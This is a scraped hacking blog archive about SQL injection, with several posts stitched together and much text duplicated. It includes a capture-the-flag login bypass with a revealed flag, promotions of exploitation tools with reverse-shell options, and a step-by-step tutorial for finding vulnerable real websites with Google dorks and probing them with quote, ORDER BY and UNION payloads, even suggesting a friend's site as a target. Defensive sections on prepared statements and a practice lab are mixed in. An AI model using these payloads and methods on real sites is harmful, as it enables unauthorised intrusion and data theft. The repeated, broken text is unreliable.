Wanna Break this lock..?
use
'' OR 1=1--
this Sqli Cheat code
then Lock gets Open
the code is
Connexion réussie. Le fl4g est 3406654e25675f56ce7922cf5ec12952
Don't Forget to Follow
Showing posts with label SQL injection. Show all posts
Showing posts with label SQL injection. Show all posts
Wednesday, March 6, 2013
Tuesday, March 20, 2012
Safe3 SQL Injector – Automatic Detection & Exploitation Of SQL Injection Flaws
Safe3 SQL Injector is one of the most powerful penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of back-end database servers.
Features
You can download Safe3 SQL Injector here:
Safe3SI.6.2.rar
Features
- Full support for GET/Post/Cookie Injection
- Full support for HTTP Basic, Digest, NTLM and Certificate authentications
- Full support for MySql Oracle, PostgreSQL, MSSQL, ACESS, DB2, Sybase & Sqlite
- Full support for Error/Union/Blind/Force SQL injection
- Support for file access, command execute, IP Domain reverse, web path guess, md5 crack etc.
- Super bypass WAF
You can download Safe3 SQL Injector here:
Safe3SI.6.2.rar
sqlsus 0.7.1 Released – MySQL Injection & Takeover Tool
sqlsus is an open source MySQL injection and takeover tool, written in perl. Via a command line interface, you can retrieve the database(s) structure, inject your own sql queries , download files from the web server, crawl the website for writable directories, upload and control a backdoor, clone the database, and much more.Whenever relevant, sqlsus will mimic a MySQL console output.
- Added time-based blind injection support (added option “blind_sleep”, and renamed “string_to_match” to “blind_string”).
- It is now possible to force sqlsus to exit when it’s hanging (i.e.: retrieving data), by hitting Ctrl-C more than twice.
- Rewrite of “autoconf max_sendable”, so that sqlsus will properly detect which length restriction applies. (removed option “max_sendable”, added options “max_url_length” and “max_inj_length”)
- Uploading a file now sends it into chunks under the length restriction.
- sqlsus now saves variables after each command, so that forcing it to quit (or killing it) will not discard the changes that were made.
- Added a progress bar to inband mode, sqlsus now determines the number of rows to be returned prior to fetching them.
- get db (tables/columns) in inband mode now uses multithreading (like everything else).
- clone now uses count(*) if available (set by “get count” / “get db”), instead of using fetch-ahead.
- sqlsus now prints what configuration options are overridden (when a saved value differs from the configuration file).
You can download sqlsus 0.7.1 here:
sqlsus-0.7.1.tgz
The Mole – Automatic SQL Injection SQLi Exploitation Tool
The Mole – Automatic SQL Injection SQLi Exploitation Tool
The Nole is an automatic SQL injection exploitation tool. YOou just need to provide SQL vulnerable LINK and valid string on the shitty site and it can detect the injection and it will exploit it using union technique or a boolean query based technique. You can hack any sql vulnerable website using this tool.
Features
- Support for injections using Mysql, SQL Server, Postgres and Oracle databases.
- Command line interface. Different commands trigger different actions.
- Developed in python 3.
- Support for query filters, in order to bypass certain IPS/IDS rules using generic filters, and the possibility of creating new ones easily.
- Auto-completion for commands, command arguments and database, table and columns names.
You can download it from here
Windows: themole-0.2.6-win32.zip
Linux: themole-0.2.6-lin-src.tar.gz
If you want to know how to use this tool then click here
If you want to know how to use this tool then click here
Blind Cat: A Blind SQL Injection Exploitation Tool
Blind Cat: A Blind SQL Injection Exploitation Tool
Blind Cat is not a fully automated tool, the ones we call – “one click ownage“. You are the driving force behind this tool. Once, you understand how this tool works, you will be able to exploit a lot more difficult SQL injections easily. Consider this tool as an automation tool/front-end for manual blind SQL injections.
Sql Poizon ~ Sqli Exploit Scanner Tool
Sql Poizon tool includes php , asp , rfi , lfi dorks and using this tools you can find vulnerable sites like sql vulnerable sites and you can also find vulnerable sites by country and you can hack sql vulnerable sites using Sql Poizon tool and you can also browse the sites using this tool.
You can download Sql Poizon here
Maxsqli syntax maker tool
This tool helps hackers/pen testers to create sql syntax. Its also help in waf bypass sql injection method. you can see the tool in the above snapshot.
Download it from here
Saturday, February 25, 2012
Top 10 ways to exploit SQL Server Systems
Whether it is through manual poking and prodding or the use of security testing tools, malicious attackers employ a variety of tricks to break into SQL Server systems, both inside and outside your firewall. It stands to reason then, if the hackers are doing it, you need to carry the same attacks to test the security strength of your systems. Here are 10 hacker tricks to gain access and violate systems running SQL Server.
1. Direct connections via the Internet
These connections can be used to attach to SQL Servers sitting naked without firewall protection for the entire world to see (and access). DShield's Port Report shows just how many systems are sitting out there waiting to be attacked. I don't understand the logic behind making a critical server like this directly accessible from the Internet, but I still find this flaw in my assessments, and we all remember the effect the SQL Slammer worm had on so many vulnerable SQL Server systems. Nevertheless, these direct attacks can lead to denial of service, buffer overflows and more.
2. Vulnerability scanning
Vulnerability scanning often reveals weaknesses in the underlying OS, the Web application or the database system itself. Anything from missing SQL Server patches to Internet Information Services (IIS) configuration weaknesses to SNMP exploits can be uncovered by attackers and lead to database server compromise. The bad guys may use open source, home-grown or commercial tools. Some are even savvy enough to carry out their hacks manually from a command prompt. In the interest of time (and minimal wheel spinning), I recommend using commercial vulnerability assessment tools like QualysGuard from Qualys Inc. (for general scanning), WebInspect from SPI Dynamics (for Web application scanning) and Next Generation Security Software Ltd.'s NGSSquirrel for SQL Server (for database-specific scanning). They're easy to use, offer the most comprehensive assessment and, in turn, provide the best results. Figure 1 shows some SQL injection vulnerabilities you may be able to uncover.
3. Enumerating the SQL Server Resolution Service
Running on UDP port 1434, this allows you to find hidden database instances and probe deeper into the system. Chip Andrews' SQLPing v 2.5 is a great tool to use to look for SQL Server system(s) and determine version numbers (somewhat). This works even if your SQL Server instances aren't listening on the default ports. Also, a buffer overflow can occur when an overly long request for SQL Servers is sent to the broadcast address for UDP port 1434.
4. Cracking SA passwords
Deciphering SA passwords is also used by attackers to get into SQL Server databases. Unfortunately, in many cases, no cracking is needed since no password has been assigned (Oh, logic, where art thou?!). Yet another use for the handy-dandy SQLPing tool mentioned earlier. The commercial products AppDetective from Application Security Inc. and NGSSQLCrack from NGS Software Ltd. also have this capability.
5. Direct-exploit attacks
Direct attacks using tools such as Metasploit, shown in Figure 2, and its commercial equivalents (CANVAS and CORE IMPACT) are used to exploit certain vulnerabilities found during normal vulnerability scanning. This is typically the silver-bullet hack for attackers penetrating a system and performing code injection or gaining unauthorized command-line access.
6. SQL injection
SQL injection attacks are executed via front-end Web applications that don't properly validate user input. Malformed SQL queries, including SQL commands, can be inserted directly into Web URLs and return informative errors, commands being executed and more. These attacks can be carried out manually -- if you have a lot of time. Once I discover that a server has a potential SQL injection vulnerability, I prefer to perform the follow-through using an automated tool, such as SPI Dynamics' SQL Injector
1. Direct connections via the Internet
These connections can be used to attach to SQL Servers sitting naked without firewall protection for the entire world to see (and access). DShield's Port Report shows just how many systems are sitting out there waiting to be attacked. I don't understand the logic behind making a critical server like this directly accessible from the Internet, but I still find this flaw in my assessments, and we all remember the effect the SQL Slammer worm had on so many vulnerable SQL Server systems. Nevertheless, these direct attacks can lead to denial of service, buffer overflows and more.
2. Vulnerability scanning
Vulnerability scanning often reveals weaknesses in the underlying OS, the Web application or the database system itself. Anything from missing SQL Server patches to Internet Information Services (IIS) configuration weaknesses to SNMP exploits can be uncovered by attackers and lead to database server compromise. The bad guys may use open source, home-grown or commercial tools. Some are even savvy enough to carry out their hacks manually from a command prompt. In the interest of time (and minimal wheel spinning), I recommend using commercial vulnerability assessment tools like QualysGuard from Qualys Inc. (for general scanning), WebInspect from SPI Dynamics (for Web application scanning) and Next Generation Security Software Ltd.'s NGSSquirrel for SQL Server (for database-specific scanning). They're easy to use, offer the most comprehensive assessment and, in turn, provide the best results. Figure 1 shows some SQL injection vulnerabilities you may be able to uncover.
 |
| Common SQL injection vulnerabilities found using WebInspect. |
Running on UDP port 1434, this allows you to find hidden database instances and probe deeper into the system. Chip Andrews' SQLPing v 2.5 is a great tool to use to look for SQL Server system(s) and determine version numbers (somewhat). This works even if your SQL Server instances aren't listening on the default ports. Also, a buffer overflow can occur when an overly long request for SQL Servers is sent to the broadcast address for UDP port 1434.
4. Cracking SA passwords
Deciphering SA passwords is also used by attackers to get into SQL Server databases. Unfortunately, in many cases, no cracking is needed since no password has been assigned (Oh, logic, where art thou?!). Yet another use for the handy-dandy SQLPing tool mentioned earlier. The commercial products AppDetective from Application Security Inc. and NGSSQLCrack from NGS Software Ltd. also have this capability.
5. Direct-exploit attacks
Direct attacks using tools such as Metasploit, shown in Figure 2, and its commercial equivalents (CANVAS and CORE IMPACT) are used to exploit certain vulnerabilities found during normal vulnerability scanning. This is typically the silver-bullet hack for attackers penetrating a system and performing code injection or gaining unauthorized command-line access.
 | |
| SQL Server vulnerability exploitable using Metasploit's MSFConsole. |
SQL injection attacks are executed via front-end Web applications that don't properly validate user input. Malformed SQL queries, including SQL commands, can be inserted directly into Web URLs and return informative errors, commands being executed and more. These attacks can be carried out manually -- if you have a lot of time. Once I discover that a server has a potential SQL injection vulnerability, I prefer to perform the follow-through using an automated tool, such as SPI Dynamics' SQL Injector
 |
| SPI Dynamics' SQL Injector tool automates the SQL injection process. |
7. Blind SQL injection
These attacks go about exploiting Web applications and back-end SQL Servers in the same basic fashion as standard SQL injection. The big difference is that the attacker doesn't receive feedback from the Web server in the form of returned error messages. Such an attack is even slower than standard SQL injection given the guesswork involved. You need a good tool for this situation, and that's where Absinthe, shown in Figure 4, comes in handy.
These attacks go about exploiting Web applications and back-end SQL Servers in the same basic fashion as standard SQL injection. The big difference is that the attacker doesn't receive feedback from the Web server in the form of returned error messages. Such an attack is even slower than standard SQL injection given the guesswork involved. You need a good tool for this situation, and that's where Absinthe, shown in Figure 4, comes in handy.
 | |
| Absinthe tool takes the pain out of blind SQL injection testing. |
8. Reverse engineering the system
The reverse engineering trick looks for software exploits, memory corruption weaknesses and so on. In this sample chapter from the excellent book Exploiting Software: How to Break Code by Greg Hoglund and Gary McGraw, you'll find a discussion about reverse engineering ploys.
9. Google hacks
Google hacks use the extraordinary power of the Google search engine to ferret out SQL Server errors -- such as "Incorrect syntax near" -- leaking from publicly accessible systems. Several Google queries are available at Johnny Long's Google Hacking Database. (Look in the sections titled Error Messages and Files containing passwords.) Hackers use Google to find passwords, vulnerabilities in Web servers, underlying operating systems, publicly available procedures and more that they can use to further compromise a SQL Server system. Combining these queries with Web site names via Google's 'site:' operator often turns up juicy info you never imagined you could unearth.
10. Perusing Web site source code
Source code can also turn up information that may lead to a SQL Server break in. Specifically, developers may store SQL Server authentication information in ASP scripts to simplify the authentication process. A manual assessment or Google could uncover this information in a split second.
The reverse engineering trick looks for software exploits, memory corruption weaknesses and so on. In this sample chapter from the excellent book Exploiting Software: How to Break Code by Greg Hoglund and Gary McGraw, you'll find a discussion about reverse engineering ploys.
9. Google hacks
Google hacks use the extraordinary power of the Google search engine to ferret out SQL Server errors -- such as "Incorrect syntax near" -- leaking from publicly accessible systems. Several Google queries are available at Johnny Long's Google Hacking Database. (Look in the sections titled Error Messages and Files containing passwords.) Hackers use Google to find passwords, vulnerabilities in Web servers, underlying operating systems, publicly available procedures and more that they can use to further compromise a SQL Server system. Combining these queries with Web site names via Google's 'site:' operator often turns up juicy info you never imagined you could unearth.
10. Perusing Web site source code
Source code can also turn up information that may lead to a SQL Server break in. Specifically, developers may store SQL Server authentication information in ASP scripts to simplify the authentication process. A manual assessment or Google could uncover this information in a split second.
How to Find a vulnerable website?
Google is best friend for Hackers. We can find the Vulnerable website using google search. This is known as Google Dorks.
Small List of Google Dork:
Download A large list of Google dork
copy one from above list and paste in google search box,hit enter
You can see list of websites ending with that url for eg:
Go to that link.
add ' (single quote) at the end of the url.
For eg:
http://www.victim.com/index.php?id=2'
Now hit enter.
if the page remains in the same page,then it is not vulnerable website.
If the page show any error or show blank page, then it is vulnerable website.
Now let's check further.
Remove single quote from url
Then add this "order by x" (without quotes)
replace the x with 0,1,2,....n.(until it show error page).
For Eg:
http://www.victim.com/index.php?id=2 order by 1 (no error)
http://www.victim.com/index.php?id=2 order by 2 (no error)
http://www.victim.com/index.php?id=2 order by 3 (no error)
http://www.victim.com/index.php?id=2 order by 4 (no error)
http://www.victim.com/index.php?id=2 order by 5(error)
Now you can come to one conclusion is that website has 4 columns.
Also it is vulnerable.
If the above method is not working,then try this:
http://www.victim.com/index.php?id=2 order by 1-- (no error)
http://www.victim.com/index.php?id=2 order by 2-- (no error)
http://www.victim.com/index.php?id=2 order by 3-- (no error)
http://www.victim.com/index.php?id=2 order by 4-- (no error)
http://www.victim.com/index.php?id=2 order by 5--(error)
If this is also not working,then try this:
http://www.victim.com/index.php?id=2 and 1=2 order by 1-- (no error)
http://www.victim.com/index.php?id=2 and 1=2 order by 2-- (no error)
http://www.victim.com/index.php?id=2 and 1=2 order by 3-- (no error)
http://www.victim.com/index.php?id=2 and 1=2 order by 4-- (no error)
http://www.victim.com/index.php?id=2 and 1=2 order by 5--(error)
Note:
if you want to hack particular website like www.yourfriendwebsite.com, then go to that website. Find the
webpage that ends with any of google dorks list items.
Small List of Google Dork:
inurl:index.php?id=
inurl:gallery.php?id=
inurl:post.php?id=
inurl:article?id=
inurl:gallery.php?id=
inurl:post.php?id=
inurl:article?id=
Download A large list of Google dork
copy one from above list and paste in google search box,hit enter
You can see list of websites ending with that url for eg:
http://www.victim.com/index.php?id=2
Go to that link.
add ' (single quote) at the end of the url.
For eg:
http://www.victim.com/index.php?id=2'
Now hit enter.
if the page remains in the same page,then it is not vulnerable website.
If the page show any error or show blank page, then it is vulnerable website.
Now let's check further.
Remove single quote from url
Then add this "order by x" (without quotes)
replace the x with 0,1,2,....n.(until it show error page).
For Eg:
http://www.victim.com/index.php?id=2 order by 1 (no error)
http://www.victim.com/index.php?id=2 order by 2 (no error)
http://www.victim.com/index.php?id=2 order by 3 (no error)
http://www.victim.com/index.php?id=2 order by 4 (no error)
http://www.victim.com/index.php?id=2 order by 5(error)
Now you can come to one conclusion is that website has 4 columns.
Also it is vulnerable.
If the above method is not working,then try this:
http://www.victim.com/index.php?id=2 order by 1-- (no error)
http://www.victim.com/index.php?id=2 order by 2-- (no error)
http://www.victim.com/index.php?id=2 order by 3-- (no error)
http://www.victim.com/index.php?id=2 order by 4-- (no error)
http://www.victim.com/index.php?id=2 order by 5--(error)
If this is also not working,then try this:
http://www.victim.com/index.php?id=2 and 1=2 order by 1-- (no error)
http://www.victim.com/index.php?id=2 and 1=2 order by 2-- (no error)
http://www.victim.com/index.php?id=2 and 1=2 order by 3-- (no error)
http://www.victim.com/index.php?id=2 and 1=2 order by 4-- (no error)
http://www.victim.com/index.php?id=2 and 1=2 order by 5--(error)
Note:
if you want to hack particular website like www.yourfriendwebsite.com, then go to that website. Find the
webpage that ends with any of google dorks list items.
How to Prevent SQL Injection Vulnerability?
Hi webmasters and budding Pen Testers, I hope you read my article about SQL Injection. Our Aim is to provide Security, right? So here is the prevention techniques.
Use Prepared Statements:
Use prepared statements, parameterized queries, or stored procedures. Don't use Dynamic SQL.
You can use Stored Procedures also. Unlike prepared statements, stored procedures are kept in the database. Both require first to define the SQL code, and then to pass parameters.
Use Less Privilege Account:
Use less privilege account for database connections. That account should not be able to drop the able or create. Maintain two separate accounts.
Escape user input.
This powerful function rejects the possibility of many clever techniques used by the intruders. php provides escpe string function. Later we will discuss about the syntax.
Assume magic quotes is always off.
When the magic_quotes_gpc variable is off, this can prevent some (but not all) SQL injection attacks. Magic quotes are not an ultimate defense and what is worse - sometimes they are off and you don't know about it. This is why it is necessary to have code for the substitution of quotes with slashes. Here is :
Install patches regularly and timely.
Even if your code doesn't have SQL vulnerabilities, when the database server, the operating system, or the development tools you use have vulnerabilities, this is also risky. This is why you should always install patches, especially SQL vulnerabilities patches, right after they become available.
Use automated test tools for SQL injections.
Even if you follow the above said prevention, there will be some vulnerability. You may not notice it. So check the vulnerability of your web application with some kind of SQLi tools.
Try SQL inject Me tool to test the Vulnerability of your WebSite.
See i just explained theoretically, I didn't explain with code. Don't worry, wait for my next post.
Use Prepared Statements:
Use prepared statements, parameterized queries, or stored procedures. Don't use Dynamic SQL.
- In Java you can use PreparedStatement() with bind variables
- In .NET you can use parameterized queries, such as SqlCommand() or OleDbCommand() with bind variables
- In PHP you can use PDO with strongly typed parameterized queries (using bindParam()).
You can use Stored Procedures also. Unlike prepared statements, stored procedures are kept in the database. Both require first to define the SQL code, and then to pass parameters.
Use Less Privilege Account:
Use less privilege account for database connections. That account should not be able to drop the able or create. Maintain two separate accounts.
Escape user input.
This powerful function rejects the possibility of many clever techniques used by the intruders. php provides escpe string function. Later we will discuss about the syntax.
Assume magic quotes is always off.
When the magic_quotes_gpc variable is off, this can prevent some (but not all) SQL injection attacks. Magic quotes are not an ultimate defense and what is worse - sometimes they are off and you don't know about it. This is why it is necessary to have code for the substitution of quotes with slashes. Here is :
$username = $_POST['username'];if the magic quotes is enabled , the following problem will arise:
$password = $_POST['password'];
if (!get_magic_quotes_gpc()) {
$username = addslashes($username);
$password = addslashes($password);
}
- Not all data that are supplied by the user are intended for insertion into a database. They may be rendered directly to the screen, stored in a session, or previewed before saving. This can result in backslashes being added where they are not wanted and being shown to the end user. This bug often creeps into even widely used software.[7]
- Not all data that are supplied by the user and used in a database query are obtained directly from sources protected by magic quotes. For instance, a user-supplied value might be inserted into a database — protected by magic quotes — and later retrieved from the database and used in a subsequent database operation. The latter use is not protected by magic quotes, and a naive programmer used to relying on them may be unaware of the need to protect it explicitly.
- Magic quotes also use the generic functionality provided by PHP's addslashes() function, which is not Unicode aware and still subject to SQL injection vulnerabilities in some multi-byte character encodings. Database-specific functions such as mysql_real_escape_string() or, where possible, prepared queries with bound parameters are preferred.[8][9]
- While many DBMS support escaping quotes with a backslash, the standard actually calls for using another quote. Magic quotes offer no protection for databases not set up to support escaping quotes with a backslash.
- Portability is an issue if an application is coded with the assumption that magic quotes are enabled and is then moved to a server where they are disabled, or the other way round.
- Adding magic quotes and subsequently removing them where appropriate incurs a small but unnecessary performance overhead.
- Magic quotes do not protect against other common security vulnerabilities such as cross-site scripting attacks or SMTP header injection attacks.
Install patches regularly and timely.
Even if your code doesn't have SQL vulnerabilities, when the database server, the operating system, or the development tools you use have vulnerabilities, this is also risky. This is why you should always install patches, especially SQL vulnerabilities patches, right after they become available.
Use automated test tools for SQL injections.
Even if you follow the above said prevention, there will be some vulnerability. You may not notice it. So check the vulnerability of your web application with some kind of SQLi tools.
Try SQL inject Me tool to test the Vulnerability of your WebSite.
See i just explained theoretically, I didn't explain with code. Don't worry, wait for my next post.
SQL Inject Me -SQL Injection Tool to test the Vulnerability for Pen Testers
So far i have written what is sql Injection, How to prevent SQL Injection? . In this post, i am going to introduce a new SQLi tool for Pen Testers and Webmasters.
The tool name is SQL Inject Me.
Download it From here:
The tool works by submitting your HTML forms and substituting the form value with strings that are representative of an SQL Injection attack.
The tool works by sending database escape strings through the form fields. It then looks for database error messages that are output into the rendered HTML of the page.
The tool does not attempting to compromise the security of the given system. It looks for possible entry points for an attack against the system. There is no port scanning, packet sniffing, password hacking or firewall attacks done by the tool.
The tool name is SQL Inject Me.
What is SQL Inject Me?
SQL Inject Me is Mozilla addon that is used to test the SQL Injection Vulnerability of Web Application. It reduces the workload of Manual SQL Injection Test. This is especially designed for Pen Testers and Web Masters not for hackers.
Download it From here:
https://addons.mozilla.org/en-US/firefox/addon/sql-inject-me/How it works?
The tool works by submitting your HTML forms and substituting the form value with strings that are representative of an SQL Injection attack.
The tool works by sending database escape strings through the form fields. It then looks for database error messages that are output into the rendered HTML of the page.
The tool does not attempting to compromise the security of the given system. It looks for possible entry points for an attack against the system. There is no port scanning, packet sniffing, password hacking or firewall attacks done by the tool.
UPDATE: Safe3 Sql Injector v8.6
Safe3 developers have brought us the updated Safe3 Sql Injector version 8.3. We have discussed about Safe3 Sql Injector in detail here.
This update fixes a lot of bugs.
Download Safe3 Sql Injector v8.6 (Safe3SI v8.6) here.
“Safe3 is one of the most powerful and easy usage penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a kick-ass detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.”
This update fixes a lot of bugs.
Download Safe3 Sql Injector v8.6 (Safe3SI v8.6) here.
How does your Website becomes vulnerable to SQL Injection?
Developer is the one and only reason for the SQL Injection Vulnerability. While developing the Web Application, he fails to handle some vulnerability(because he doesn't know about it. Don't be one of them. If you are Web Application developer, then you must read these security techniquest in order to overcome the SQL Injection Vulnerability.
Consider this code:
statement = "SELECT * FROM `users` WHERE `name` = '" + userName + "';"
This code will check the username in datbase. An attacker can use malicious codes to inject his own query. for eg:
He can use the comments to block the rest of the query .
for eg:
SELECT * FROM `users` WHERE `name` = '' OR 1=1 -- ;
Here name=' ' is false. But '1'='1' is true. Here we used OR operator. So it is enough to one condition is true. So this will query bypass the login.
Let us consider this query.
Statement=”Select * from `userid` where `id`=”+inputId+”;” ;
Here Id refers a number data. But the inputId is given directly without checking for the type. So attacker can enter any type of data, he can enter a string.
For example if he input as
1; drop table `userid`;
The query will become as
Select * from `userid` where `id`=1; drop table `userid`;
Reason 3: Blind SQL Injection(Condtion Response)
Blind SQL Injection is used when a web application is vulnerable to an SQL injection but the results of the injection are not visible to the attacker.
The page with the vulnerability may not be one that displays data but will display differently depending on the results of a logical statement injected into the legitimate SQL statement called for that page.
This type of attack can become time-intensive because a new statement must be crafted for each bit recovered. There are several tools that can automate these attacks once the location of the vulnerability and the target information has been established
Conditional responses
SELECT `booktitle` FROM `booklist` WHERE `bookId` = 'OOk14cd' AND '1'='1';
will result in a normal page while
SELECT `booktitle` FROM `booklist` WHERE `bookId` = 'OOk14cd' AND '1'='2';
will likely give a different result if the page is vulnerable to a SQL injection
Using this , an attacker can find the column and full datbase details.
Reason 1:Incorrectly filtered escape characters
In this case, the developer fails to filter the input for escape characters and He directly pass the input to SQL statement. This results in vulnerability.Consider this code:
statement = "SELECT * FROM `users` WHERE `name` = '" + userName + "';"
This code will check the username in datbase. An attacker can use malicious codes to inject his own query. for eg:
' or 1=1he can enter the above code instead of the username. So the SQL statement will become like this:
SELECT * FROM `users` WHERE `name` = '' OR 1=1;
He can use the comments to block the rest of the query .
for eg:
' or 1=1 --so the query will become like this:
SELECT * FROM `users` WHERE `name` = '' OR 1=1 -- ;
Here name=' ' is false. But '1'='1' is true. Here we used OR operator. So it is enough to one condition is true. So this will query bypass the login.
Reason 2:Incorrect Type Handling
When the developer fails to check for the data type of input, it will raise the Vulnerability of Database.Let us consider this query.
Statement=”Select * from `userid` where `id`=”+inputId+”;” ;
Here Id refers a number data. But the inputId is given directly without checking for the type. So attacker can enter any type of data, he can enter a string.
For example if he input as
1; drop table `userid`;
The query will become as
Select * from `userid` where `id`=1; drop table `userid`;
Reason 3: Blind SQL Injection(Condtion Response)
Blind SQL Injection is used when a web application is vulnerable to an SQL injection but the results of the injection are not visible to the attacker.
The page with the vulnerability may not be one that displays data but will display differently depending on the results of a logical statement injected into the legitimate SQL statement called for that page.
This type of attack can become time-intensive because a new statement must be crafted for each bit recovered. There are several tools that can automate these attacks once the location of the vulnerability and the target information has been established
Conditional responses
SELECT `booktitle` FROM `booklist` WHERE `bookId` = 'OOk14cd' AND '1'='1';
will result in a normal page while
SELECT `booktitle` FROM `booklist` WHERE `bookId` = 'OOk14cd' AND '1'='2';
will likely give a different result if the page is vulnerable to a SQL injection
Using this , an attacker can find the column and full datbase details.
List of Online SQL Injection Scanner Websites
http://www.be007.gigfa.com/scanner/scanner.php
http://www.sunmagazin.com/tools/hack/SQLI-Scan
http://scanner.drie88.tk
http://localvn.biz/Tools/tools/Hack-Shop/SQLI-Scan
http://wolfscps.com/gscanner.php
http://www.sunmagazin.com/tools/hack/SQLI-Scan
http://scanner.drie88.tk
http://localvn.biz/Tools/tools/Hack-Shop/SQLI-Scan
http://wolfscps.com/gscanner.php
Automated Blind SQL Injection Attacking Tools~bsqlbf Brute forcer
What is Blind SQL Injection:Some Websites are vulnerable to SQL Injection but the results of injection are not visible to the attacker. In this situation, Blind SQL Injection is used. The page with the vulnerability may not be one that displays data but will display differently depending on the results of a logical statement injected into the legitimate SQL statement called for that page. This type of attack can become time-intensive because a new statement must be crafted for each bit recovered.
There are plenty of automated Blind Sql Injection tool available. Here i am introducing one of Tool named as bsqlbf(expanded as Blind Sql Injection Brute Forcer).
This tool is written in Perl and allows extraction of data from Blind SQL Injections. It accepts custom SQL queries as a command line parameter and it works for both integer and string based injections
Supported Database:
- MS-SQL
- MySQL
- PostgreSQL
- Oracle
The tool supports 8 attack modes(-type switch):-
Type 0: Blind SQL Injection based on true and false conditions returned by back-end serverType 1: Blind SQL Injection based on true and error(e.g syntax error) returned by back-end server.
Type 2: Blind SQL Injection in "order by" and "group by".
Type 3: extracting data with SYS privileges (ORACLE dbms_export_extension exploit)
Type 4: is O.S code execution (ORACLE dbms_export_extension exploit)
Type 5: is reading files (ORACLE dbms_export_extension exploit, based on java)
Type 6: is O.S code execution DBMS_REPCAT_RPC.VALIDATE_REMOTE_RC exploit
Type 7: is O.S code execution SYS.KUPP$PROC.CREATE_MASTER_PROCESS(), DBA Privs
-cmd=revshell Type 7 supports meterpreter payload execution, run generator.exe first
Type 8: is O.S code execution DBMS_JAVA_TEST.FUNCALL, with JAVA IO Permissions
-cmd=revshell Type 8 supports meterpreter payload execution, run generator.exe first
For Type 4(O.S code execution) the following methods are supported:
-stype: How you want to execute command:
SType 0 (default) is based on java..will NOT work against XE.
SType 1 is against oracle 9 with plsql_native_make_utility.
SType 2 is against oracle 10 with dbms_scheduler.
Disclaimer:
This Article is for Education purpose only. The above mentioned software is developed for Penetration testers to test their own Web application Vulnerability. Ethical Hacking Lab to Test and Learn SQL injection,XSS, CSRF Vulnerability
Hi BTS readers, so far i have gave the Web Application Pen Testing tutorials . Now it is time to for practicing your skills in legal way. Last time , i explained about the Damn Vulnerable Web Application(DVWA). This time i came with different web application that will develop your knowledge in Web App PenTesting.
With this Vulnerable Application , you can practice the Following attacks:
How to setup the Pen Testing Lab?
Requirements:
step 1:Install the Tomcat
Install the Tomcat in your system. If you don't know how to do install the tomcat , do google search.
Step 2: Start the server
Start the tomcat server.
In Ubuntu, type the following command in Terminal:
Step 3:
Open the browser and type "localhost:8080". It will show a page "It works !". There you can access the manager webapp(http://localhost:8080/manager/html) page. Clicking the link will ask to enter the username and password. enter your computer username and password.
Step 4:
Now you are in "Tomcat Web Application Manager" page. Scroll down and there you can see theWAR file to deploy form.
Step 5: Deploying the WAR
click the Browse button and select the bodgeit.WAR file . Now click the Deploy button.
Yes, Now the Application successfully installed..
Access the BodgeIt in this location: http://localhost:8080/bodgeit/
Enjoy ..! if you have any queries, please comment here.
The BodgeIt Store
Like DVWA, This is also a Vulnerable web Application that will help you to develop your skills in Pen testing.With this Vulnerable Application , you can practice the Following attacks:
- Cross Site Scripting (XSS)
- SQL injection (SQLi)
- Hidden (but unprotected) content
- Cross Site Request Forgery
- Debug code
- Insecure Object References
- Application logic vulnerabilities
How to setup the Pen Testing Lab?
Requirements:
- BodgeIt app(download)
- Tomcat server
step 1:Install the Tomcat
Install the Tomcat in your system. If you don't know how to do install the tomcat , do google search.
Step 2: Start the server
Start the tomcat server.
In Ubuntu, type the following command in Terminal:
sudo /etc/init.d/tomcat6 startFor windows users, just click the tomcat server in all programs.
Step 3:
Open the browser and type "localhost:8080". It will show a page "It works !". There you can access the manager webapp(http://localhost:8080/manager/html) page. Clicking the link will ask to enter the username and password. enter your computer username and password.
Step 4:
Now you are in "Tomcat Web Application Manager" page. Scroll down and there you can see theWAR file to deploy form.
Step 5: Deploying the WAR
click the Browse button and select the bodgeit.WAR file . Now click the Deploy button.
Yes, Now the Application successfully installed..
Enjoy ..! if you have any queries, please comment here.
Before we see what SQL Injection is. We should know what SQL and Database are.
Database:
Database is collection of data. In website point of view, database is used for storing user ids,passwords,web page details and more.
Some List of Database are:
* DB servers,
* MySQL(Open source),
* MSSQL,
* MS-ACCESS,
* Oracle,
* Postgre SQL(open source),
* SQLite,
SQL:
Structured Query Language is Known as SQL. In order to communicate with the Database ,we are using SQL query. We are querying the database so it is called as Query language.
Definition from Complete reference:
Simple Basic Queries for SQL:
Select * from table_name :
this statement is used for showing the content of tables including column name.
For eg:
select * from users;
Insert into table_name(column_names,...) values(corresponding values for columns):
For inserting data to table.
For eg:
insert into users(username,userid) values("BreakTheSec","break");
I will give more detail and query in my next thread about the SQL QUERY.
What is SQL Injection?
SQL injection is Common and famous method of hacking at present . Using this method an unauthorized person can access the database of the website. Attacker can get all details from the Database.
What an attacker can do?
* ByPassing Logins
* Accessing secret data
* Modifying contents of website
* Shutting down the My SQL server
Now let's dive into the real procedure for the SQL Injection.
Follow my steps.
Step 1: Finding Vulnerable Website:
Our best partner for SQL injection is Google. We can find the Vulnerable websites(hackable websites) using Google Dork list. google dork is searching for vulnerable websites using the google searching tricks. There is lot of tricks to search in google. But we are going to use "inurl:" command for finding the vulnerable websites.
Some Examples:
inurl:index.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:pageid=
Here is the huge list of Google Dork
http://www.ziddu.com/download/13161874/A...t.zip.html
How to use?
copy one of the above command and paste in the google search engine box.
Hit enter.
You can get list of web sites.
We have to visit the websites one by one for checking the vulnerability.
So Start from the first website.
Note:if you like to hack particular website,then try this:
site:www.victimsite.com dork_list_commands
for eg:
Now we should check the vulnerability of websites. In order to check the vulnerability ,add the single quotes(') at the end of the url and hit enter. (No space between the number and single quotes)
For eg:
If it showing any errors which is related to sql query,then it is vulnerable. Cheers..!!
For eg:
Step 3: Finding Number of columns:
Now we have found the website is vulnerable. Next step is to find the number of columns in the table.
For that replace the single quotes(') with "order by n" statement.(leave one space between number andorder by n statement)
Change the n from 1,2,3,4,,5,6,...n. Until you get the error like "unknown column ".
For eg:
if you get the error while trying the "x"th number,then no of column is "x-1".
I mean:
Sometime the above may not work. At the time add the "--" at the end of the statement.
For eg:
Step 4: Displaying the Vulnerable columns:
Using "union select columns_sequence" we can find the vulnerable part of the table. Replace the "order by n" with this statement. And change the id value to negative(i mean id=-2,must change,but in some website may work without changing).
